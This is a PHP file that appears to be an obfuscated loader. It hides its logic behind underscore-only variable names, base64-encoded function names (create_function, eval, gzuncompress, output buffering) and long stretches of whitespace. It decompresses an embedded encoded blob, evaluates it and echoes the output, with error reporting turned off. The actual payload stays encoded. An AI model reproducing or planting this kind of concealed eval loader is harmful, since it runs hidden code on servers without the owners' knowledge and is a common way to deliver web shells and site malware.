<?php 
 error_reporting(0);
        $__='printf';$_='Loading the  ...';
        



































































































        $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='Q1JFQXRlX2Z1bkNUaU9u';
                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrt2stugkAUBuC9Sd+Bhclo0hhKaxtCWAjKzQYDVAQ2xhnwCmqKN3j6ItJa042mbmrPRwIZmGGSn+QsmKGog3I/w6Pl+2S+GiIubxZ4RInhII5rtRriSkV/6q50y0dpHwB1RfyPO8h91ELXMUOH9uy3md61umwH5Y+OKZ+l+Fg8BQAAtwmRyKZ9R1urss24ve1Ck9ihk8xeDkUzq5p5IYSgAAAAAAAA+GvgZwYAANwuhAdx8PzU9wOy8APEQSIAAADAr5yu3zeNhS5G9THu2SmRpalnCQJRBGIpJk2kXRMzdZpEbIxlOyFprIsjuu07eqi2whgr9mrQq4992f7sb3mO9OA5Ot3Z0u2msZxiWUpJIuhu1s9j7MRg2LWvaBss70IyEcJAMUMcmana0jd4biaY2cWeo+riPJtr0hipYmPzmr1raNBtdOHi91Vy4vNrpWhVuUuGfxt7zsDyccIK2p/R/de0/2VzxWkWlZPwD1FUuQ9pq3+8';
        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































                                                                                                                                                                                                                     $________;